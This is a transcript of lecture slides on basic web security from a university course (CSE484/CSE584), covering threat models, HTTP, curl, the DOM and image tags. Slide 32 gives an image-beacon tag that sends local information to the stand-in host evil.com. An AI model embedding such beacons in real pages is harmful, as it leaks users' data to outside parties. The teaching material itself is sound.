cse484 cse584
play

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web - PowerPoint PPT Presentation

Oct 03, 2023 •457 likes •907 views

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Web Security Web Attacker Sets up malicious site visited by victim; no control of network Alice Network Security Network Attacker Intercepts and controls network communication

  1. CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits

  2. Web Security Web Attacker Sets up malicious site visited by victim; no control of network Alice

  3. Network Security Network Attacker Intercepts and controls network communication Alice

  4. Web Malware Attacker Malware Attacker Escapes the browser to wreak havoc on Alice’s machine Alice

  5. Web Threat Models  Web attacker  Control https://attacker.com  Can obtain SSL/TLS certificate for https://attacker.com  User visits attacker.com This is what connects the world  Or: runs attacker’s Facebook app, etc. of web attacks to low-level  Network attacker memory-based exploitation  Passive: Wireless eavesdropper we’ve seen so far  Active: Evil router, DNS poisoning  Malware attacker  Attacker escapes browser isolation mechanisms and run separately under control of OS

  6. Goals of Web Security Sa Safely browse th the web Support secu ecure e web eb applic lications  Applications delivered over  Users should be able to We will see a lot the web should have the visit a variety of web sa same se security propertie ies of Java and PHP sites, without incurring we require for stand-alone and JavaScript, applications harm: but not C or C++  No stolen information  Maybe even better such as login credentials or properties because most cookies web applications enjoy the  Site A cannot compromise protection provided by memory ry-safe lan languages session at Site B

  7. Looking Ahead  HTTP  Communication  Rendering content  Navigation  Cookies  Security User Interface  Isolation  Frames and frame busting

  8. HTTP

  9. URLs or URIs  Global identifiers of network-retrievable documents  Example le: https://courses.cs.washington.edu:80/courses/cse484/14au/#schedule Protocol Fragment Hostname Path Port  Special characters are encoded as hex:  %0A = newline  %20 or + = space, %2B = + (special exception)

  10. Short and Long URLs 10 10 Bit.ly: http://bit.ly/1vEIGks  http://longurlmaker.com:  http://www.longurlmaker.com/go?id=7continuedg20fIs.gd0GetShortyagl56001drawn%2Boutu6lingeringShortlinksX .sestretchedd7lingeringzc8faraway0UrlTeajbstretched15jcontinued011expanded86v3stretchedqdXil40ShortenURLk Xilz401spun%2Boutq54bextensiveShrtndwoutstretched151TinyLinkcontinued2lastingdltallaU76nr0h61g5aIs.gdd01 41cMooURL085ShortURLcShortenURL40stretchrangyXil3p17hSitelutionsuwURLvi1enlargedc03743186701Dwarfurl 4aefwextensive0EasyURL315continuedbprotractedb19GetShorty2SHurl171enduring038r8bURLviremote6URL1Shor tURLspun%2Boutelongated0aX.seoutstretched0d4distantSimURL27highd418olasting9ShoterLink8stretchedoSHurl4 lankydrawn%2Bout0drawn%2Boutlofty19a2kenduringShortenURLxs0spread%2Bout9distantFly2d10101great0w78 NutshellURL190Minilienstretchedn0stretchd0ShortenURL0enlargedtallX.seelongated9URL.co.ukspun%2BoutURLvi8 e1012Shim00Ulimit7lasting3Shim034far%2Boff47spun%2Bout17nwelongated17a99eeexpandedtallm9MooURL1dr emote46URL11NutshellURLStartURLb5itall40c6Shrinkr0Fly2lasting91n8clengthened51X.se5Minilien2ShredURLBea m.to99continued131G8L1ffarawaycontinued0distantrangy7c04964300315a2RubyURLfU76154j1roh82lengthened0 faraway1z4outstretched1lr1B654301URL09stringyq8ShrinkURL184h7Dwarfurldrunningloftylingering18spread%2Bo ut68101ShortURL10kalengthy9B653ab41fextensive0prolonged7p11expandedprolongedremotec2Minilien0dB65str etchingarfaraway3extensive1yclnk.in9lankygreat50TightURL173cURL.co.ukmba2049815920prolonged8fprotractedf 0stringy6i164eelongatedMiniliene9elongated0PiURL1488gd2020a30far%2Breachinglengthy216d411t691elongate1 6extensived0drawn%2Bout11lankyYepItB65Shim31extensiveURLCutterShim99GetShorty1042Fly2af0e8protractede longatey0111563FhURL9c3TinyURLn8toweringDwarfurl10d6350c5TightURL3lnk.in03Shrtnd6g0lingering18gangling prolonged8astringy7StartURL100TraceURLSmallr01drawn%2Bout60ganglingstringy80Beam.tocdistantsG8LX.sedra wn%2Boutedrawn%2Bouty040SitelutionsU7601drawn%2Bout6f53A2N2lasting1194stretchinggangling20lnk.inURLC utter135b80b3ShortURL6far%2Boffm013q515deep8WapURLShrinkURLd410090lnk.infar%2Boff701far%2Boff96ling ering8a6x38118Redirxfar%2Breaching1stretched0protracted16t0l21130b90106zShoterLink967Smallr9R

  11. HTTP Request Method File HTTP version Headers GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats Blank line Data – none for GET GET : no side effect POST : possible side effect

  12. POST 12 12 POST /pass.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://127.0.0.1/pass.php Cookie: passx=87e8af376bc9d9bfec2c7c0193e6af70; PHPSESSID=l9hk7mfh0ppqecg8gialak6gt5 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30 username=zurfyx&pass=password

  13. Automation with CURL 13 13  curl --data "birthyear=1905&press=%20OK%20" http://www.example.com/when.cgi  curl --data-urlencode "name=I am Daniel" http://www.example.com  Submit/POST binary data to a URL  curl -X POST --data-binary @myfile.bin http://foo.com

  14. HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 21 Apr 1996 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Data Last-Modified: Thu, 18 Apr 1996 17:39:05 GMT Set- Cookie: … Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> Cookies

  15. Common HTTP Codes 15 15 200 OK 401 Unauthorized 300 Multiple Choices 403 Forbidden 301 Moved Permanently 404 Not Found 302 Found 410 Gone 304 Not Modified 500 Internal Server Error 307 Temporary Redirect 501 Not Implemented 400 Bad Request 503 Service Unavailable 550 Permission denied

  16. Browser Tools 16 16

  17. Watch the HTTP Traffic 17 17

  18. HTTP Supports Caching 18 18

  19. And Responses Can Be Interesting 19 19

  20. And Surprising… 20 20

  21. Interacting with Google using CURL 21 21 1. Authenticate with Google first curl https://www.google.com/accounts/ClientLogin --data-  urlencode Email= you@gmail.com --data-urlencode Passwd= yourpasswd -d accountType=GOOGLE -d source= your.org-your.service- your.service.version -d service=wise SID=DQAAANcAAABjXXX; LSID=DQAAANoAXXX; Auth=DQAAANkAXXX  2. Get your spreadsheets curl --silent --header "Authorization: GoogleLogin  auth= DQAAANkAXXX " "https://spreadsheets.google.com/feeds/spreadsheets/private/full " | tidy -xml -indent -quiet 3. Get a particular spreadsheet curl --silent --header "Authorization: GoogleLogin auth=$AUTH"  "https://spreadsheets.google.com/feeds/download/spreadsheets/Exp ort?key=$KEY&exportFormat=tsv" | sort -n -k 15 -t $'\t'

  22. Rendering Content

  23. Rendering and Events  Each browser window  Events can be or frame…  User actions:  Loads content  OnClick  OnMouseover  Renders it  Rendering:  Processes HTML and scripts to display page  OnLoad  May involve images,  OnBeforeUnload sub-frames, etc.  Timing:  Responds to events  setTimeout()  clearTimeout()

  24. Connecting it All Together 24 24

  25. Slightly More Complex… 25 25

  26. Document Object Model (DOM) Object-oriented interface used to  read and write docs  Web page in HTML is structured data  DOM provides representation of this hierarchy Includes Browser Object Model  (BOM)  window  document  frames[]  history  location  navigator (type and version of browser)

  27. Deep DOM Trees 27 27

  28. Pre-Year 2000 28 28 frame

  29. Pre-Year 2000: Functionality Added Via JavaScript 29 29 frame

  30. Changing HTML using JavaScript, DOM  Some possibilities  createElement(elementName) HTML <ul id="t1">  createTextNode(text) <li> Item 1 </li>  appendChild(newChild) </ul>  removeChild(node)  Example: Add a new list item: var list = document.getElementById('t1') var newitem = document.createElement('li') var newtext = document.createTextNode(text) list.appendChild(newitem) newitem.appendChild(newtext)

  31. HTML Image Tags 31 31 < html > … < p > … </ p > … < img src =“http://example.com / sunset.gif ” height="50" width="100"> … </ html > Any security issues?

  32. Image Beacons 32 32  Communicate with other sites  <img src =“http://evil.com/ pass- local- information.jpg?extra_info rmation ”>  Hide resulting image  <img src =“ … ” height=“1" width=“1">  Spoof other sites: add logos that fool a user

  33. Beacons in Practice 33 33

  34. onError in JavaScript 34 34  Triggered in case of error  Can register a JavaScript handler <img src="image.gif" onerror= "alert( 'The image couldn’t be loaded .')“ >

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2

CSE484/CSE584 BROWSER SECURITY AND WEB VULNERABILITIES Dr. Benjamin Livshits Taxonomy of XSS 2 XSS-0 : client-side XSS-1 : reflective XSS-2 : persistent XSS Is Exceedingly Common 3 Web Hacking Incident Database (1999 -

887 views • 44 slides
CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Final Project 2 How many of you have

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Final Project 2 How many of you have

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Final Project 2 How many of you have your teams fully formed How many of you are still looking for a team? How many of you have a copy of A Bug Hunters Diary book? How many

537 views • 30 slides
CSE484/CSE584 MOBILE PLATFORM SECURITY Dr. Benjamin Livshits Two Main Attack Vectors Web

CSE484/CSE584 MOBILE PLATFORM SECURITY Dr. Benjamin Livshits Two Main Attack Vectors Web

CSE484/CSE584 MOBILE PLATFORM SECURITY Dr. Benjamin Livshits Two Main Attack Vectors Web browser Installed apps Both types of threats increasing in prevalence and sophistication source:

861 views • 31 slides
CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, Labs, and Project 2 Please

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, Labs, and Project 2 Please

CSE484/CSE584 DRIVE-BY MALWARE Dr. Benjamin Livshits Homework, Labs, and Project 2 Please be ready to give HW-3 due Friday a short 2-minute pitch Lab-3 due Tuesday about your strategy We want to give you Ask more questions

792 views • 21 slides
CSE484/CSE584 SECURE DESIGN PRINCIPLES, OS, AND RUNTIME SECURITY Dr. Benjamin Livshits Some of

CSE484/CSE584 SECURE DESIGN PRINCIPLES, OS, AND RUNTIME SECURITY Dr. Benjamin Livshits Some of

CSE484/CSE584 SECURE DESIGN PRINCIPLES, OS, AND RUNTIME SECURITY Dr. Benjamin Livshits Some of f the Common Principles Minimize attack Secure by surface area Default Principle of Fail-Safe Least Stance Privilege Secure the

975 views • 56 slides
CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Is Isolation Frame and IFRAME

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Is Isolation Frame and IFRAME

CSE484/CSE584 BASIC WEB SECURITY MODEL Dr. Benjamin Livshits Is Isolation Frame and IFRAME Window may contain frames from different sources Frame: rigid division as part of frameset iFrame: flo floati ting inline frame iFrame

787 views • 60 slides
CSE484/CSE584 MEMORY-(UN)SAFETY Dr. Benjamin Livshits FUD About Shellshock 2 CVE-2014-6271

CSE484/CSE584 MEMORY-(UN)SAFETY Dr. Benjamin Livshits FUD About Shellshock 2 CVE-2014-6271

CSE484/CSE584 MEMORY-(UN)SAFETY Dr. Benjamin Livshits FUD About Shellshock 2 CVE-2014-6271 Announcement 3 How Systems Fail il Systems may fail for many reasons, including Reliability deals with accidental failures Usability deals

778 views • 62 slides
COURSE IN INTRODUCT CTION Dr. Benjamin Livshits High-Level Course Logistics 2 https:/

COURSE IN INTRODUCT CTION Dr. Benjamin Livshits High-Level Course Logistics 2 https:/

CSE484/CSE584 COURSE IN INTRODUCT CTION Dr. Benjamin Livshits High-Level Course Logistics 2 https:/ ://courses.c .cs.washin ington.e .edu/courses/cse484/14au Course Logistics 3 Office hours: Tuesday after class Office hours: Mon

826 views • 59 slides
DIGITAL IDENTITY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Brief

DIGITAL IDENTITY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Brief

DIGITAL IDENTITY Ben Livshits, Microsoft Research Overview of Todays Lecture 2 Brief history of user Popular identity identities protocols SAML Single sign-on OpenID InfoCard and CardSpace Federated identity

786 views • 66 slides
Web Security Presenter: Yinzhi Cao Slides Inherited and Modified from Prof. John Mitchell

Web Security Presenter: Yinzhi Cao Slides Inherited and Modified from Prof. John Mitchell

CSE343/443 Lehigh University Fall 2015 Web Security Presenter: Yinzhi Cao Slides Inherited and Modified from Prof. John Mitchell Reported Web Vulnerabilities &quot;In the Wild&quot; 1200 1000 800 Input Validation CSRF 600 XSS SQLi

1.27k views • 105 slides
The Origin of Near Earth The Origin of Near Earth The Origin of Near Earth The Origin of Near

The Origin of Near Earth The Origin of Near Earth The Origin of Near Earth The Origin of Near

The Origin of Near Earth The Origin of Near Earth The Origin of Near Earth The Origin of Near Earth Asteroids Asteroids Asteroids Asteroids Judit Judit Gy Ries Ries Ries Judit Judit rgyey Ries Gy Gy rgyey rgyey Gy rgyey

465 views • 24 slides
Securing Internet Communication: TLS, contd Network security CS 161: Computer Security Prof.

Securing Internet Communication: TLS, contd Network security CS 161: Computer Security Prof.

Securing Internet Communication: TLS, contd Network security CS 161: Computer Security Prof. Raluca Ada Popa Feb 27, 2018 Some slides credit David Wagner Announcements Midterm grades released Regrades: Read the follow-ups on the

1.75k views • 156 slides
CSCI 6760 - Computer Networks Spring 2017 Instructor: Prof. Roberto Perdisci perdisci@cs.uga.edu

CSCI 6760 - Computer Networks Spring 2017 Instructor: Prof. Roberto Perdisci perdisci@cs.uga.edu

source: computer-networks-webdesign.com CSCI 6760 - Computer Networks Spring 2017 Instructor: Prof. Roberto Perdisci perdisci@cs.uga.edu These slides are adapted from the textbook slides by J.F. Kurose and K.W. Ross Chapter 2: Application

1.25k views • 111 slides
Serial Entrepreneurship Raj Jaswa January 2018 My 3 Different Companies Technology:

Serial Entrepreneurship Raj Jaswa January 2018 My 3 Different Companies Technology:

Serial Entrepreneurship Raj Jaswa January 2018 My 3 Different Companies Technology: Semiconductor, Enterprise Software, Consumer Funding: Angel, VC, VC Size of Funding: &lt;$1M, &gt;$35M, -$10M Customer: PC mfrs, Global

532 views • 21 slides
Computer Security environment, without compromising functionality or security? Three parts

Computer Security environment, without compromising functionality or security? Three parts

9/7/2013 Some topics Im working on Computing on encrypted data Information flow: Dynamic IFC in Haskell, web Sandboxing Untrusted JavaScript Third party web tracking and other web security stories Practical web security

572 views • 21 slides
Data Management in Distributed Systems Simon Schffner Advisor: Stefan Liebald Technische

Data Management in Distributed Systems Simon Schffner Advisor: Stefan Liebald Technische

Data Management in Distributed Systems Simon Schffner Advisor: Stefan Liebald Technische Universitt Mnchen Fakultt fr Informatik Lehrstuhl fr Netzarchitekturen und Netzdienste Garching, 13. Juli 2018 Distributed Systems Simon

1.01k views • 86 slides
I NTRODUCTION TO W EB S ECURITY by Fabrizio dAmore Department of Computer, Control, and

I NTRODUCTION TO W EB S ECURITY by Fabrizio dAmore Department of Computer, Control, and

I NTRODUCTION TO W EB S ECURITY by Fabrizio dAmore Department of Computer, Control, and Management Engineering Antonio Ruberti Sapienza University of Rome WHY W EB S ECURITY April 2013 recent studies conform a trend that has been

958 views • 62 slides
Objective The main purpose of preservation of fruits is to protect Different methods of

Objective The main purpose of preservation of fruits is to protect Different methods of

4/2/2012 Objective The main purpose of preservation of fruits is to protect Different methods of processing, preparation of processed foods against spoilage. products and minimal processing of fruits. Fresh fruits are highly perishable

531 views • 9 slides
MOL2NET Evaluation of the antioxidant and photoprotective activity of X ylopia langsdorffiana

MOL2NET Evaluation of the antioxidant and photoprotective activity of X ylopia langsdorffiana

MOL2NET , 2018 , pages 1-3 1 http://sciforum.net/conference/mol2net-02/wrsamc SciForum MOL2NET Evaluation of the antioxidant and photoprotective activity of X ylopia langsdorffiana St-hill &amp; Tul. Rodrigo Silva de Andrade 1, *, Diego Igor

309 views • 3 slides
ParentConnect is Coming to YOUR School This Fall! The Peel District School Board is excit- ed to

ParentConnect is Coming to YOUR School This Fall! The Peel District School Board is excit- ed to

ParentConnect is Coming to YOUR School This Fall! The Peel District School Board is excit- ed to announce that ParentCon- nect, our new parent portal, is launching this fall at your students school. ParentConnect is a safe and secure

301 views • 12 slides
SP Infrastructure Security Survey &amp; Attack Classification Danny McPherson danny@arbor.net

SP Infrastructure Security Survey &amp; Attack Classification Danny McPherson danny@arbor.net

SP Infrastructure Security Survey &amp; Attack Classification Danny McPherson danny@arbor.net &amp; Ray Hunt ray.hunt@canterbury.ac.nz Apricot 2006 - Perth, Australia 1 Goals Given time constraints, focus will be given to providing

1.03k views • 86 slides
Medical Decision Making Learning: Decision Trees Artificial Intelligence CSPP 56553 February

Medical Decision Making Learning: Decision Trees Artificial Intelligence CSPP 56553 February

Medical Decision Making Learning: Decision Trees Artificial Intelligence CSPP 56553 February 11, 2004 Agenda Decision Trees: Motivation: Medical Experts: Mycin Basic characteristics Sunburn example From trees to rules

578 views • 28 slides
Outline Overview Part I: Emacs ESS tutorial, UseR! 2011 meeting part II: ESS Stephen Eglen

Outline Overview Part I: Emacs ESS tutorial, UseR! 2011 meeting part II: ESS Stephen Eglen

Outline Overview Part I: Emacs ESS tutorial, UseR! 2011 meeting part II: ESS Stephen Eglen Part III: Sweave Part IV: Org mode 2011-08-15 Advanced topics Part V Future steps / Q &amp; A session / open discussion End Aims of the tutorial

847 views • 26 slides
A Beginners Guide Dr. Andrew Robinson Part 1 Introduction The Quantum Jump 9:38 AM About

A Beginners Guide Dr. Andrew Robinson Part 1 Introduction The Quantum Jump 9:38 AM About

Quantum Weirdness: A Beginners Guide Dr. Andrew Robinson Part 1 Introduction The Quantum Jump 9:38 AM About Me From Bakewell PhD in Physical Chemistry Worked in Berlin, Liverpool, Birmingham In Canada since 2000 Worked

1.01k views • 58 slides

More recommend